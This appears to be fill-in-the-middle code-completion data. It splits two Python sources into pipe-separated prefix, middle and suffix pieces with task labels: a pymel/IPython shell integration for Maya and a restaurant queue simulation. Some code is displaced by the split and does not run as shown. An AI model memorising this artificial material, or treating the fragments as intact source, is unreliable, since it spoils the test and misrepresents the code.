if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
ps = ip.ev('_sh[-2]' % nn)
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def | (*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler()
sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main()
| sigint_plugin_loaded_callback | identifier_name |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The amount of number to generate, default value is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue() | >>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generating the data for groups, and run the simulation
:param Duration: Total length of time the simulation would run
:param amount: Estimated number of groups would come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Generate vip situation, based on the probability of 8%
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # all group have their unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Deal with the situation that several groups arrive at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client() | >>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1) | random_line_split |
Server.py | import numpy as np
def mod_pert_random(low, likely, high, confidence=4, samples=30):
"""Produce random numbers according to the 'Modified PERT'
distribution.
:param low: The lowest value expected as possible.
:param likely: The 'most likely' value, statistically, the mode.
:param high: The highest value expected as possible.
:param confidence: This is typically called 'lambda' in literature
about the Modified PERT distribution. The value
4 here matches the standard PERT curve. Higher
values indicate higher confidence in the mode.
:param samples: The amount of number to generate, default value is 30.
Formulas from "Modified Pert Simulation" by Paulo Buchsbaum.
"""
# Check minimum & maximum confidence levels to allow:
confidence = min(8, confidence)
confidence = max(2, confidence)
mean = (low + confidence * likely + high) / (confidence + 2)
a = (mean - low) / (high - low) * (confidence + 2)
b = ((confidence + 1) * high - low - confidence * likely) / (high - low)
beta = np.random.beta(a, b, samples)
beta = beta * (high - low) + low
return beta
class Queue:
def __init__(self):
self.groups = []
def queue_size(self):
"""
Get the length of queue, namely, the number of groups currently waiting
:return: int, number of groups waiting in queue
"""
return len(self.groups)
def isEmpty(self):
"""
Whether there is still group waiting
:return: True/False
"""
if len(self.groups) > 0:
return False
else:
return True
def add_queue(self, group):
"""
Add the newly come group into queue properly
:param group: the group watiing for entering into the queue
>>> g0=Group(12,2,False,0)
>>> q2=Queue()
>>> q2.add_queue(g0)
>>> len(q2.groups) # Test whether group is correctly added
1
>>> g1=Group(14,1,True,1)
>>> q2.add_queue(g1)
>>> q2.groups[1].get_groupID() # Test whether vip would become the first
0
>>> g2=Group(20,2,False,2)
>>> q2.add_queue(g2)
>>> g3=Group(30,1,True,3)
>>> q2.add_queue(g3)
>>> q2.groups[0].get_groupID() # Test whether vip skip the queue properly
2
>>> q2.groups[1].get_groupID()
3
"""
if group.get_vip(): # If current group is a VIP group, move it forward by four groups,
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
|
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # delete last=delete first come group
"""
Pop the head (index = length of queue -1 ) of queue
:return: Object Group
"""
return self.groups.pop()
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When one group finish their meal, set their table's current group to none
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict, {No. of the table: the ending time point, of the current group with it, for the table}
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duartion is done, for groups who are not assigned
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generating the data for groups, and run the simulation
:param Duration: Total length of time the simulation would run
:param amount: Estimated number of groups would come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Generate vip situation, based on the probability of 8%
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
